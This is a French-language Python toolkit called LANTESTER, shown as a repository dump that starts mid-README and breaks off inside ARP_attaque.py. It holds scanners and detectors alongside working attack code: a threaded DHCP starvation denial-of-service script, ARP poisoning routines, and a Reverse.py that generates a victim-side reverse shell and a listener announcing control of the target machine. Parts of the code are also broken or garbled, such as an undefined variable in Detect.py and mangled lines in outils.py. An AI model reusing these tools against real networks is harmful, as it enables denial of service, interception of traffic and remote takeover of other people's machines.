]
6 |
7 | -s --sniff -Sniffer la communication tcp d'une cible .
8 | -d --detect -Detecter une attaque arp poisoning ou un serveur DHCP malveillant.
9 | -S --scan=scanType -Specifier le type de scan : tcp, udp, icmp-echo.
10 | -P --proto=protocol -Specifier le protocol a tester: dhcp , dns, arp.
11 | -f --flags=flags -Specifier le type de scan si le scan est sur TCP: SYN, FIN,
12 | ACK, NULL, XMAS.
13 | -t --target=target_ip -Specifier une cible pour le scan.
14 | -p --port=port_range -Specifier une plage de ports a scanner.
15 | -i --interface -Specifier l'interface pour la detection
16 | -h --help -Afficher ce menu d'usage.
17 |
18 |
19 |
20 | Examples :
21 |
22 | python lantester.py -s -p tcp -P 80 192.168.1.100
23 | python lantester.py -d tcp -f SYN 192.168.1.10
24 | python lantester.py -d dhcpserver -i eth0
25 | python lantester.py -d arppoison - i wlan0 -t 192.168.1.0/24
26 | python lantester.py -P dhcp
27 | python lantester.py -s -i eth0
28 | python lantester.py -d udp -p 1,108 192.168.1.10
29 | python lantester.py -d tcp -p 80 -f FIN 192.168.1.10/24
30 | python lantester.py -d tcp -p 23 -f SYN serv.domaine.com
31 |
32 |
33 |
34 |
35 |
36 |
37 | ## Disclaimer
38 | These tools are made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users.
39 |
--------------------------------------------------------------------------------
/DHCPtester.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import logging
4 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
5 |
6 | import sys, signal
7 | import scapy
8 | from scapy.all import *
9 | import dhcpTools
10 | import threading
11 |
12 | conf.verb=0
13 |
14 |
15 |
16 | def DHCPtester():
17 |
18 |
19 | print "\t\t\t\t------------Script de lancement d'attaque DOS sur DHCP---------------------"
20 |
21 | try:
22 | interface=raw_input("Veuiller entrer l'interafce reseau a utiliser :")
23 | while True:
24 | print "\n\t\t\t\t\t\tMENU:"
25 | print """
26 | 1.Decouvrir les paramatres de configuration du reseau
27 | 2.Lancer une attaque DOS sur le serveur DHCP
28 | 3.Changer l'interafce reseau
29 | 4.Arreter/Quitter le script
30 | """
31 | rep=raw_input("Veuillez choisir une action a effectuer : ")
32 | if rep=="1":
33 | dhcpTools.get_configuration(interface)
34 | elif rep=="2":
35 | print 'Attaque en cours ...'
36 | lock = threading.Lock()
37 | threads=[]
38 | try:
39 | for i in range(6):
40 | thread= threading.Thread(target=dhcpTools.starvation, args=(interface,lock,))
41 | threads.append(thread)
42 | thread.setDaemon(True)
43 | thread.start()
44 |
45 | while True:
46 | pass
47 | except Exception as e:
48 | print e
49 |
50 | elif rep=="3":
51 | interface=raw_input("Entrez le nom de l-interface a utiliser :")
52 |
53 | elif rep=="4":
54 | break
55 | else:
56 | print("\n Option inconnue , veuillez ressayer de nouveau.")
57 |
58 |
59 | except Exception as e :
60 | print 'Erreur main'+str(e)
61 | sys.exit(1)
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/Detect.py:
--------------------------------------------------------------------------------
1 |
2 | from scapy.all import *
3 | import outils
4 | import time
5 |
6 |
7 | serverID=""
8 | macs={}
9 |
10 | def detect_arp_poison(subnet,interface):
11 |
12 | global macs
13 | subnetID , mask = outils.cidr(subnet)
14 | ip_addrs= outils.get_addresses(subnetID , mask)
15 |
16 | for ip in ip_addrs:
17 | t1=time.time()
18 | while True:
19 | macs={}
20 | sniff(iface=interface, filter = "arp", prn=analyse_reply,timeout=10)
21 | if time.time()-t1>=10:
22 | break
23 |
24 |
25 |
26 | def analyse_reply(pkt):
27 | global serverID
28 | global macs
29 | attack=True
30 | if pkt.haslayer(ARP):
31 | if pkt[ARP].psrc==ip:
32 | mac=pkt[ARP].hwsrc
33 | ip=pkt[ARP].psrc
34 | if len(macs)==0:
35 | macs[mac]=1
36 | else:
37 | for m in macs:
38 | if m==mac:
39 | macs[mac]+=1
40 | break
41 | else:
42 | macs.append(mac)
43 |
44 |
45 | for m in macs.keys():
46 | if macs[m]>=2:
47 | break
48 | else :
49 | attack=False
50 | if attack or len(macs.keys())>1:
51 | print "[!] L'hote %s est une victime potentielle ."
52 | print "L'adresse mac de l'attaquant est parmi les suivantes :"
53 | for mac in macs.keys():
54 | print mac
55 |
56 | elif pkt.haslayer(DHCP):
57 | options=pkt[DHCP].options
58 | for op in options:
59 | if op[0]=="server_id":
60 | serverID=op[1]
61 | break
62 | print "[+] Une offre DHCP recu du serveur d'identifiant : %s "%serverID
63 | ans=raw_input("Tapper sur Enter pour continuer la decouverte des offres ou ctlc pour quitter :")
64 |
65 |
66 |
67 |
68 | def detect_DHCP_servers(interface):
69 |
70 | mac=outils.randomMac()
71 | xid_disc=random.randint(0xfff00000,0xfffff000)
72 |
73 | DHCPdisc=IP(dst="255.255.255.255", src="0.0.0.0")/UDP(sport=68 , dport=67)/BOOTP(op=1 ,xid=xid_disc,ciaddr="0.0.0.0",yiaddr="0.0.0.0",
74 | flags=0x8000,chaddr=mac)/DHCP(options=[("message-type","discover"),"end"])
75 | send(DHCPdisc,loop=0,verbose=0,iface=interface)
76 | sniff(iface=interface , lfilter = lambda x : x.haslayer(DHCP) and x[BOOTP].xid==xid_disc , prn=analyse_reply)
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/outils.py:
--------------------------------------------------------------------------------
1 | import sys, random, struct, socket
2 | from ast import literal_eval
3 | import scanner
4 |
5 | def randomMac():
6 | mac="\\x70\\x77"
7 | for i in range(4):
8 | mac+=("\\x"+(format((random.randint(0,255)),'02x')))
9 | return literal_eval("'%s'"%mac)
10 |
11 | def get_subnetID(ip, mask):
12 | ip_num= struct.unpack("!L",socket.inet_aton(ip))[0]
13 | mask_num = struct.unpack("!L", socket.inet_aton(mask))[0]
14 | subID_num = ip_num & mask_num
15 | subID=socket.inet_ntoa(struct.pack("!L",subID_num))
16 | return str(subID)
17 |
18 | def in_subnet(ip,netID,mask):
19 | mask_bytes=mask.split('.')
20 | netID_bytes=netID.split('.')
21 | broad_bytes=[]
22 | i =0
23 | while i<4 :
24 | if int(mask_bytes[i])==0:
25 | break
26 | else :
27 | i+=1
28 | j=0
29 | while ji-1 and k<4:
36 | broad_bytes.append(str(255))
37 | k+=1
38 | broad='.'.join(broad_bytes)
39 | ip_num=struct.unpack("!L",socket.inet_aton(ip))
40 | netID_num=struct.unpack("!L",socket.inet_aton(netID))
41 | broad_num=struct.unpack("!L",socket.inet_aton(broad))
42 | return netID_num0 :\n\n#traiter la commande \'cd\' a part \n\t\t\tif str(data[:2]) == "cd":\n\t\t\t\ts.send(os.chdir(str(data[3:])))\n\t\t\t\ttime.sleep(1)\n\t\t\telse:\n\t\t\t\tcmd = subprocess.Popen(str(data[:]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \t\t\toutput = cmd.stdout.read() + cmd.stderr.read() \n \t\t\ts.send(str(output + os.getcwd() ))\n\t\t\t\ttime.sleep(1)\n\t\telse:\n\t\t\ts.send(os.getcwd())\n\t\t\ttime.sleep(1)\n\n\ndef main():\n\tconnect()\n\tgiving_control()\n\nmain()')
21 | client_file.write(script)
22 | client_file.close()
23 | print "[!] OK "
24 |
25 |
26 |
27 |
28 | def creation_de_socket():
29 | global host
30 | global port
31 | global s
32 | port = int(sys.argv[1])
33 | host = '' # specifie que la socket is reachable by any address la machine happens to have
34 | try :
35 | s = socket.socket()
36 | # * socket() creates an endpoint for communication
37 | # * it is only given a protocol family, but not assigned an address
38 | # * socket() takes three arguments: domain(AF_INET , AF_INET6 , ...),
39 | # type(SOCKET_STREAM,SOCK_DGRAM....),protocole on specifie le protocol niveau transport qu'on va utliser ( IPPROTO_TCP, IPPROTO_UDP)
40 | print "[+] Creation de socket "
41 | except Exception,e :
42 | print "[-] Erreur de creation de socket : " + e
43 |
44 | def bind_and_listen():
45 | print "[+] Binding ... "
46 | try :
47 | s.bind((host,port))
48 | print "[+] Listening ... "
49 | s.listen(5) # * causes socket to enter listening state.
50 | # * the argument(backlog) to listen tells the socket that we want it
51 | # to queue up as many as 5 connect requests (the normal max) before refusing outside connections.
52 | print "[!] Le server attend maintenant la victime ... "
53 | except Exception,e:
54 | print "[-] Erreur dans la fonction BIND() ou LISTEN() : " + e
55 | print " Relancement des fonctions ... "
56 | bind_and_listen()
57 |
58 |
59 | def accept():
60 | connection,client_param = s.accept() # * It accepts a received incoming attempt to create a new TCP connection from the remote client,
61 | # and creates a new socket associated with the socket address pair of this connection and removes the connection from the listen queue
62 | print "[!] Connection de la victime [!]"
63 | for i in range(1,5):
64 | print "..."
65 | time.sleep(0.5)
66 |
67 |
68 | print "[!] La machine cible est sous votre controle \n "
69 | print "[!] L'adresse IP de la victime est : "+str(client_param[0])+ " depuis le port "+ str(client_param[1])
70 |
71 | control(connection)
72 | connection.close()
73 |
74 | def control(connection):
75 |
76 | time.sleep(1)
77 | print str(connection.recv(1024))
78 | while True:
79 | cmd = raw_input()
80 | if cmd == "kill" :
81 | connection.close()
82 | s.close()
83 | sys.exit(0)
84 | if len(str(cmd)) > 0:
85 | connection.send(str(cmd))
86 | time.sleep(1)
87 | client_response = str(connection.recv(20000)) # * buffer size grand au cas ou on lance une commande avec un
88 | # resultat tres grand comme ' ps -ef '
89 | print client_response
90 |
91 | def reverse():
92 |
93 | if len(sys.argv) == 2 : # le premier argv c a d argv[0] contient le nom du script
94 | print " \t \t \t \t bienvenue !\n"
95 | print " "
96 | print "Everything is possible , the impossible is merely something you don't know how to do it,YET. \n \n "
97 | generation_du_script_de_la_victime()
98 | creation_de_socket()
99 | bind_and_listen()
100 | accept()
101 |
102 | else:
103 |
104 | print "ajouter comment argument le port du listening "
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
--------------------------------------------------------------------------------
/dhcpTools.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | import outils , time , sys
3 |
4 | counter=0
5 | macs={}
6 | locker=None
7 |
8 |
9 |
10 | def get_configuration(interface):
11 | global intf
12 | global displayed
13 | displayed= False
14 | intf=interface
15 |
16 | while True:
17 |
18 | mac=outils.randomMac()
19 | xid_disc=random.randint(0xfff00000,0xfffff000)
20 | DHCPdisc=IP(dst="255.255.255.255", src="0.0.0.0")/UDP(sport=68 , dport=67)/BOOTP(op=1 ,xid=xid_disc,ciaddr="0.0.0.0",yiaddr="0.0.0.0",
21 | flags=0x8000,chaddr=mac)/DHCP(options=[("message-type","discover"),"end"])
22 |
23 | send(DHCPdisc,iface=interface,loop=0,verbose=0)
24 | p=sniff(iface=interface, lfilter= lambda x : x.haslayer(DHCP) and x[BOOTP].xid==xid_disc , prn=dhcp_disc_show,count=1)
25 |
26 | if displayed:
27 | displayed=False
28 | break
29 | else:
30 | continue
31 |
32 | def starvation(interface, lock):
33 | global intf
34 | global macs
35 | global locker
36 | locker=lock
37 | intf=interface
38 |
39 |
40 |
41 | while True:
42 | try:
43 |
44 | mac=outils.randomMac()
45 | xid_disc=random.randint(0xff000000,0xffffff00)
46 | macs[xid_disc]=mac
47 |
48 | DHCPdisc=IP(dst="255.255.255.255", src="0.0.0.0")/UDP(sport=68 ,dport=67)/BOOTP(op=1 ,xid=xid_disc,ciaddr="0.0.0.0",yiaddr="0.0.0.0",chaddr=mac)/DHCP(options=[("message-type","discover"),"end"])
49 | send(DHCPdisc,iface=interface,loop=0,verbose=0)
50 | sniff(iface=interface, lfilter= lambda x : x.haslayer(DHCP) and x[BOOTP].xid==xid_disc, count=1, prn=send_request)
51 | time.sleep(1)
52 |
53 | except KeyboardInterrupt:
54 |
55 | break
56 |
57 | def send_request(dhcpoffer):
58 | global macs
59 | global intf
60 | try:
61 | if dhcpoffer.haslayer(BOOTP):
62 | options=dhcpoffer.getlayer(DHCP).options
63 | if options[0][1]==2:
64 | xid_req=dhcpoffer.getlayer(BOOTP).xid
65 | ip=dhcpoffer.getlayer(BOOTP).yiaddr
66 | for op in options:
67 | if op[0]=="server_id":
68 | serverID=op[1]
69 | break
70 |
71 | DHCPreq=IP(dst="255.255.255.255", src="0.0.0.0")/UDP(dport=67 ,sport=68)/BOOTP(xid=xid_req,chaddr=macs[xid_req])/DHCP(options=[("message-type","request"),("server_id",serverID),("requested_addr",ip),"end"])
72 | send(DHCPreq,iface=intf,loop=0,verbose=0)
73 | sniff(iface=intf,lfilter= lambda x : x.haslayer(DHCP) and x[BOOTP].xid==xid_req,prn=dhcp_ack_show,count=1)
74 |
75 | except Exception as ex:
76 | print ex
77 | return
78 |
79 | def dhcp_ack_show(dhcpack):
80 | global counter, locker
81 | try:
82 | if dhcpack.haslayer(BOOTP):
83 | if dhcpack.getlayer(DHCP).options[0][1]==5:
84 | counter+=1
85 | locker.acquire()
86 | print "\n\t[+] %d)- Attribution reussite de l'adresse %s "%(counter,dhcpack.getlayer(BOOTP).yiaddr)
87 | locker.release()
88 | return
89 | else :
90 | return
91 | except:
92 | print 'Erreur dhcpshowack'
93 |
94 |
95 | def dhcp_disc_show(dhcpresp):
96 |
97 | global displayed, mask , router , serverID , domain , dns, subnetID
98 |
99 | message_type=""
100 | other=0
101 | try:
102 | if dhcpresp.haslayer(BOOTP):
103 | options=dhcpresp.getlayer(DHCP).options
104 | message_type=options[0][1]
105 | bootp=dhcpresp.getlayer(BOOTP)
106 |
107 | if message_type==2:
108 |
109 | for op in options:
110 | if op[0]=="server_id":
111 | serverID=op[1]
112 | elif op[0]=="router":
113 | router=op[1]
114 | elif op[0]=="subnet_mask":
115 | mask=op[1]
116 | elif op[0]=="domain":
117 | domain=op[1]
118 | elif op[0]=="name_server":
119 | dns=op[1]
120 | else:
121 | other+=1
122 |
123 | subnetID=outils.get_subnetID(router, mask)
124 |
125 | print "\n[+]Message DHCPoffer recu du serveur d'identifiant : %s"%serverID
126 | if outils.in_subnet(serverID , subnetID, mask):
127 | print "\n\t[+] Le serveur est dans le meme sous-reseau . "
128 | else:
129 | print "\n\t[-] Un relais DHCP est present dans ce sous-reseau ."
130 | print """
131 | \n\t\t\tLes parametres de configuration sont :\n
132 | \t[+]Routeur par defaut : %s
133 | \t[+]Adresse de sous reseau :%s
134 | \t[+]Masque de sous-reseau : %s
135 | \t[+]Domaine : %s
136 | \t[+]Serveur DNS : %s
137 | \nIl existe encore %s autres options .\n"""%(router,subnetID,mask,domain,dns,other)
138 | displayed=True
139 | return
140 | else:
141 |
142 | return
143 | except Exception as ex:
144 | print 'Erreur dhcp_disc_show :'+str(ex)
145 | return
146 |
147 |
148 |
--------------------------------------------------------------------------------
/lantester.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import logging
4 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
5 |
6 | import sys, signal, getopt, Queue, socket
7 | import outils
8 | from scapy.all import *
9 | conf.verb=0
10 |
11 | interface=None
12 | scanType=None
13 | protocol=None
14 | flags=None
15 | target_ip=None
16 | port_range=None
17 | sniff=False
18 | reverse=False
19 | detection=""
20 |
21 | def usage():
22 | print """LANTESTER
23 |
24 | Usage: lantester.py [-rs] [-p ] [-f ] [-d ] [-t ]"
25 |
26 | -s --sniff -Sniffer la communication tcp d'une cible .
27 | -d --detect -Detecter une attaque arp poisoning ou un serveur DHCP malveillant.
28 | -S --scan=scanType -Specifier le type de scan : tcp , udp , icmp-echo.
29 | -P --proto=protocol -Specifier le protocol a tester: dhcp , dns, arp.
30 | -f --flags=flags -Specifier le type de scan si le scan est sur TCP: SYN, FIN, ACK, NULL, XMAS.
31 | -t --target=target_ip -Specifier une cible pour le scan.
32 | -p --port=port_range -Specifier une plage de ports a scanner.
33 | -r --reverse -Lancer un paylaod reverseShell.
34 | -i --interface -Specifier l'interface pour la detection
35 | -h --help -Afficher ce menu d'usage .
36 | Examples :
37 | python lantester.py -s -p tcp -P 80 192.168.1.100
38 | python lantester.py -d tcp -f SYN 192.168.1.10
39 | python lantester.py -d dhcpserver -i eth0
40 | python lantester.py -d arppoison - i wlan0 -t 192.168.1.0/24
41 | python lantester.py -P dhcp
42 | python lantester.py -s -i eth0
43 | python lantester.py -d udp -p 1,108 192.168.1.10
44 | python lantester.py -d tcp -p 80 -f FIN 192.168.1.10/24
45 | python lantester.py -d tcp -p 23 -f SYN serv.domaine.com
46 | """
47 |
48 | def main():
49 |
50 | global interface , sniff , protocol , flags, target_ip, port_range, reverse, scanType , detection
51 |
52 | if len(sys.argv[1:]):
53 | try:
54 | opts, args=getopt.getopt(sys.argv[1:],"sS:P:f:t:p:rd:h:",["sniff","scan=","proto=","flags=","target=","port=","reverse","detect=","help"])
55 | except :
56 | usage()
57 | sys.exit()
58 | try :
59 |
60 | for o,a in opts:
61 | if o in ("-h","--help"):
62 | usage()
63 | sys.exit()
64 | elif o in ("-s","--sniff"):
65 | sniff=True
66 | elif o in ("-S","--scan"):
67 | scanType=a
68 | elif o in ("-P","--proto"):
69 | protocol=a
70 | elif o in ("-f","--flags"):
71 | flags=a
72 | elif o in ("-t","--target"):
73 | if outils.is_valid_ip(a):
74 | target_ip=a
75 | else:
76 | try:
77 | target_ip=socket.gethostbyname(a)
78 | except :
79 | print "Impossible de trouver l'adresse IP correspondante ."
80 | usage()
81 | sys.exit()
82 |
83 | elif o in ("-p","--port"):
84 | list=a.split(",")
85 | if len(list)==2:
86 | p, q = map(int,list)
87 | port_range=range(p,q+1)
88 | elif len(list)==1:
89 | port_range=[int(a)]
90 | elif o in ("-r","--reverse"):
91 | reverse=True
92 | elif o in ("-i","--interface"):
93 | interface=a
94 | elif o in ("-d","--detect"):
95 | detection=a
96 | elif o in ("-h","--help"):
97 | usage()
98 | sys.exit()
99 | except :
100 |
101 | sys.exit()
102 |
103 |
104 |
105 | if scanType:
106 | if sniff or reverse or protocol or (scanType=="udp" and flags) or (scanType=="icmp-echo" and (flags or port_range)):
107 | usage()
108 | sys.exit()
109 |
110 | import scanner
111 | queue = Queue.Queue()
112 | cidr=outils.cidr(target_ip)
113 | if len(cidr)==2:
114 | ip_list=outils.get_addresses(cidr[0],cidr[1])
115 | else :
116 | ip_list=cidr
117 |
118 | startTime=time.time()
119 | if scanType!="icmp-echo":
120 | for ip in ip_list:
121 | scanner.target_ip=ip
122 | for j in range(15):
123 | if scanType=="tcp":
124 | scan = scanner.TCPScanner(queue,flags)
125 | scan.setDaemon(True)
126 | scan.start()
127 | elif scanType=="udp":
128 | scan = scanner.UDPScanner(queue)
129 | scan.setDaemon(True)
130 | scan.start()
131 | if port_range:
132 | for port in port_range:
133 | queue.put(port)
134 | else:
135 | for port in range(1,1025):
136 | queue.put(port)
137 | queue.join()
138 |
139 | scanner.scan_report(startTime,scanType,port_range)
140 |
141 | else:
142 | for j in range(15):
143 | scan=scanner.pingScan(queue)
144 | scan.setDaemon(True)
145 | scan.start()
146 | for ip in ip_list:
147 | queue.put(ip)
148 |
149 | queue.join()
150 |
151 | scanner.scan_report(startTime,scanType,None)
152 |
153 | elif detection:
154 | import Detect
155 | if detection=="dhcpserver":
156 | Detect.detect_DHCP_servers(interface)
157 | elif detection=="arppoison":
158 | Detect.detect_arp_poison(target_ip,interface)
159 |
160 | elif protocol :
161 | if sniff or scanType or flags or target_ip or reverse:
162 | usage()
163 | sys.exit()
164 | if protocol=="dhcp":
165 | import DHCPtester
166 | DHCPtester.DHCPtester()
167 | elif protocol=="dns":
168 | import DNS
169 | DNS.DNStester()
170 | elif protocol=="arp":
171 | import ARP_attaque
172 | ARP_attaque.menu()
173 | elif reverse :
174 | if sniff or scanType or flags or target_ip or port_range or protocol:
175 | usage()
176 | sys.exit()
177 | import Reverse
178 | Reverse.reverse()
179 | elif sniff:
180 | if scanType or flags or not(target_ip) or port_range or not(interface) or reverse or protocol :
181 | import Sniffer
182 | sniffer =Sniffer.Sniffer(interface,"tcp", 80 ,target_ip)
183 | sniffer.sniff()
184 | if __name__=="__main__":
185 | main()
186 |
187 |
--------------------------------------------------------------------------------
/scanner.py:
--------------------------------------------------------------------------------
1 | import logging
2 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
3 | from scapy.all import *
4 | import time
5 | from datetime import date
6 | import threading
7 | conf.verb=0
8 |
9 | pingSw_subnet=None
10 | IN=False
11 | target_ip=""
12 |
13 |
14 | def port_mapping(proto):
15 | services = {}
16 | file=open("/etc/services","r")
17 | for line in file.readlines():
18 | if not(line[:1]=="#" or line[:1]==" "):
19 | if "/tcp" in line :
20 | list=line.strip("\n").split("\t")
21 | if not ( " " in list[0]):
22 | i=1
23 | while True :
24 | if len(list[i])!=0:
25 | break
26 | else:
27 | i+=1
28 | port=int(list[i].split("/")[0])
29 | services[port]=list[0]
30 | else :
31 | list=list[0].split(" ")
32 | port=int(list[1].split("/")[0])
33 | services[port]=list[0]
34 |
35 | file.close()
36 | return services
37 |
38 |
39 | def scan_report (startTime,scanType,port_range):
40 | global target_ip , IN
41 | if not IN:
42 | print"-------------------------------------------------------------------------------------------------"
43 | print "-Lancement du Scan : %s . "%time.ctime(startTime)
44 | print "-Duree du scan : %s seconds . "%str( time.time()-startTime)
45 | IN=True
46 |
47 | if scanType=="icmp-echo":
48 | dic=pingScan.host_state
49 | if not pingSw_subnet:
50 | host=dic.keys()[0]
51 | if dic[host]=="up":
52 | print "[+] L'hote %s semble up. "%host
53 | else:
54 | print "------------------- Rapport de probe icmp-echo de la plage %s ---------------- : "%pingSw_subnet
55 |
56 | for host in dic.keys():
57 | if dic[host]=="up":
58 | print "[+] %s est up ."%host
59 | else:
60 | print "[-] %s est down ."%host
61 | else:
62 | print "----------------- Rapport de scan des ports de l'hote %s --------------- : "%target_ip
63 | if len(port_range)>=2:
64 | print "Plage de ports : %d-%d/%s ."%(port_range[0],port_range[len(port_range)-1],scanType)
65 | else:
66 | print " Scan du port %d/%s."%(port_range[0],scanType)
67 | if scanType=="tcp":
68 |
69 | services=port_mapping("tcp")
70 |
71 | if len(TCPScanner.open_ports)==0 and TCPScanner.closed_ports==0:
72 | print "[-]L'hote %s semble down . "%target_ip
73 | else:
74 | print "[+]L'hote %s semble up ."%target_ip
75 | if TCPScanner.open_ports:
76 | print "\tLes ports TCP ouverts :"
77 | for port in TCPScanner.open_ports:
78 | if services.has_key(port):
79 | print '\t\t[+] %d/tcp , service %s .'%(port,services[port])
80 |
81 | print "[-]%d ports fermes . "%TCPScanner.closed_ports
82 | print '[-]%d ports filtres .'%(len(port_range)-len(TCPScanner.open_ports)-TCPScanner.closed_ports)
83 |
84 | TCPScanner.closed_ports=0
85 | TCPScanner.open_ports=[]
86 |
87 | elif scanType=="udp":
88 | if UDPScanner.closed_ports!=0:
89 | print "[+] L'hote %s semble up ."%target_ip
90 | else :
91 | print "[-] L'hote %s semble down ."%target_ip
92 |
93 | UDPScanner.closed_ports=0
94 |
95 | class pingScan(threading.Thread):
96 | host_state={}
97 | def __init__(self,queue):
98 | threading.Thread.__init__(self)
99 | self.queue=queue
100 |
101 |
102 | def run(self):
103 | while True:
104 | t_ip=self.queue.get()
105 | ip=IP(dst=t_ip)
106 | icmp= ICMP()
107 | echo_req=ip/icmp
108 | ans = sr1(echo_req,timeout=4)
109 | if ans:
110 | if ans.src==t_ip:
111 | pingScan.host_state[t_ip]="up"
112 | else :
113 | pingScan.host_state[t_ip]="down"
114 | self.queue.task_done()
115 |
116 |
117 |
118 | class TCPScanner (threading.Thread):
119 |
120 | open_ports= []
121 | closed_ports=0
122 |
123 |
124 | def __init__(self, queue,type):
125 | threading.Thread.__init__(self)
126 | self.queue=queue
127 | self.type=type
128 |
129 |
130 |
131 | def get_type(self):
132 | if self.type=="SYN":
133 | return 2
134 | elif self.type=="FIN":
135 | return 1
136 | elif self.type=="NULL":
137 | return 0
138 | elif self.type=="XMAS":
139 | return 31
140 |
141 | def run(self):
142 |
143 | while True :
144 | port = self.queue.get()
145 | tcp=TCP()
146 | tcp.flags=self.get_type()
147 | tcp.sport=random.randint(0xff10, 0xffe0)
148 | tcp.dport=port
149 | ip=IP()
150 | ip.dst=target_ip
151 | tcp_pkt=ip/tcp
152 | ans = sr1(tcp_pkt,timeout=6)
153 |
154 | if ans :
155 |
156 | if ans[TCP].flags==18:
157 | TCPScanner.open_ports.append(port)
158 | sr1(IP(dst=target_ip)/TCP(sport=ans[TCP].dport, dport=ans[TCP].sport, flags=20))
159 | elif ans[TCP].flags==20:
160 | TCPScanner.closed_ports+=1
161 | self.queue.task_done()
162 |
163 |
164 | class UDPScanner(threading.Thread):
165 |
166 | closed_ports=0
167 |
168 |
169 | def __init__(self,queue):
170 | threading.Thread.__init__(self)
171 | self.queue=queue
172 |
173 |
174 | def run(self):
175 | while True:
176 | port=self.queue.get()
177 | udp = UDP(sport=random.randint(0xff00,0xfff0), dport=port)
178 | ip=IP(dst=target_ip)
179 | sr1(ip/udp)
180 | sniff(prn=self.udp_anaylser,timeout=5)
181 | self.queue.task_done()
182 |
183 | def udp_analyser(self,pkt):
184 | if pkt.has_layer(ICMP):
185 | if pkt.src==target_ip and pkt[ICMP].type==3 and pkt[ICMP]==3:
186 | closed_ports+=1
187 | return
188 |
189 |
190 |
191 |
--------------------------------------------------------------------------------
/ARP_attaque.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | import os
3 | import subprocess
4 | import sys
5 | import time
6 | import threading
7 |
8 | def ip_scan(ip):
9 | print "SCAN DE L'ADRESSE IP "+ ip
10 | x,y = arping(ip,verbose=0)
11 | x.show()
12 |
13 | def scanning():
14 | print "[!] debut de la phase de la reconnaissance "
15 | for i in range(1,4):
16 | print"..."
17 | time.sleep(0.2)
18 | print " ----------------------------------------------------------- "
19 | ifconfig = subprocess.Popen('ifconfig wlan0 | grep \'inet adr\' | cut -d \":\" -f 2 | cut -d \" \" -f 1',shell=True,stdout = subprocess.PIPE)
20 | addr = ifconfig.stdout.read().strip('\n')
21 | print "[!] votre adresse IP est : " + addr
22 | print " ----------------------------------------------------------- "
23 | table = subprocess.Popen("route",shell=True,stdout=subprocess.PIPE)
24 | print table.stdout.read()
25 | print " ----------------------------------------------------------- "
26 | reseau = raw_input("[?] donner l'addresse reseau : ")
27 | reseau = reseau.split(".")
28 | compteur = 0
29 | for num in reseau:
30 | if num == "0":
31 | break
32 | compteur = compteur +1
33 | res = ''
34 | for i in range(0,compteur):
35 | res = res + reseau[i]+ "."
36 | if compteur == 3 :
37 | print "[!] votre reseau a comme masque 255.255.255.0"
38 | elif compteur == 2 :
39 | print "[!] votre reseau a comme masque 255.255.0.0"
40 |
41 | if compteur == 3 :
42 | plage = raw_input("[*] definir la plage (exemple:1-50):")
43 | plage = plage.split("-")
44 | if len(plage) > 1 :
45 | try:
46 | threads = []
47 | for i in range(int(plage[0]),int(plage[1])):
48 | ip = res+str(i)
49 |
50 | t = threading.Thread(target=ip_scan,args=([ip]))
51 | threads.append(t)
52 | t.start()
53 | time.sleep(0.05)
54 |
55 | except KeyboardInterrupt:
56 | print "[!] arret du scan "
57 | return menu()
58 | if len(plage) == 1 :
59 | ip = res+str(plage[0])
60 | try:
61 | print "SCAN DE L'ADRESSE IP "+ ip
62 | x,y = arping(ip,verbose=0)
63 | x.show()
64 | except KeyboardInterrupt:
65 | print "[!] arret du scan "
66 | return menu()
67 | if compteur == 2:
68 | plage1 = raw_input("[?] definir la plage pour le 3 emme octet (exemple:1-2):")
69 | plage1=plage1.split("-")
70 | plage2 = raw_input("[?] definir la plage pour le 4 emme octet (exemple:1-50):")
71 | plage2=plage2.split("-")
72 | if len(plage1) > 1 and len(plage2) > 1 :
73 | try:
74 | threads = []
75 | for i in range(plage1[0],plage1[1]):
76 | for j in range(int(plage2[0]),int(plage2[1])):
77 | ip = res+str(i)+"."+str(j)
78 | t = threading.Thread(target=ip_scan,args=([ip]))
79 | threads.append(t)
80 | t.start()
81 | time.sleep(0.05)
82 |
83 | except KeyboardInterrupt:
84 | print "[!] arret du scan "
85 | return menu()
86 | if len(plage1) == 1 and len(plage2) > 1 :
87 | try:
88 | threads = []
89 | for j in range(int(plage2[0]),int(plage2[1])):
90 | ip = res+plage1[0]+"."+str(j)
91 | t = threading.Thread(target=ip_scan,args=([ip]))
92 | threads.append(t)
93 | t.start()
94 | time.sleep(0.05)
95 |
96 | except KeyboardInterrupt:
97 | print "[!] arret du scan "
98 | return menu()
99 | if len(plage1) == 1 and len(plage2) == 1 :
100 | try:
101 | print "SCAN DE L'ADRESSE IP "+ ip
102 | x,y = arping(ip,verbose=0)
103 | x.show()
104 | except KeyboardInterrupt:
105 | print "[!] arret du scan "
106 | return menu()
107 | time.sleep(2)
108 | print "[!] Fin du scan "
109 | return menu()
110 |
111 | def antidote(mac_client,ip_client,mac_gateway,ip_gateway):
112 | print " \n lancement de l'antidote \n "
113 |
114 | for i in range(1,4):
115 | print "..."
116 | time.sleep(1)
117 |
118 | antidote_client = ARP()
119 | antidote_gateway = ARP()
120 |
121 | antidote_client.hwdst=mac_client
122 | antidote_client.op=2
123 | antidote_client.pdst=ip_client
124 | antidote_client.hwsrc=mac_gateway
125 | antidote_client.psrc=ip_gateway
126 |
127 | antidote_gateway.hwdst=mac_gateway
128 | antidote_gateway.op=2
129 | antidote_gateway.pdst=ip_gateway
130 | antidote_gateway.hwsrc=mac_client
131 | antidote_gateway.psrc=ip_client
132 |
133 | for i in range(1,10):
134 | send(antidote_client)
135 | send(antidote_gateway)
136 | return
137 |
138 | def poison(mac_client,ip_client,mac_gateway,ip_gateway):
139 | for i in range(1,4):
140 | print"..."
141 | time.sleep(0.2)
142 | poison_du_target = ARP()
143 | poison_du_gateway = ARP()
144 |
145 | poison_du_target.op = 2
146 | poison_du_target.psrc = ip_gateway
147 | poison_du_target.pdst = ip_client
148 | poison_du_target.hwdst = mac_client
149 |
150 | poison_du_gateway.op = 2
151 | poison_du_gateway.psrc = ip_client
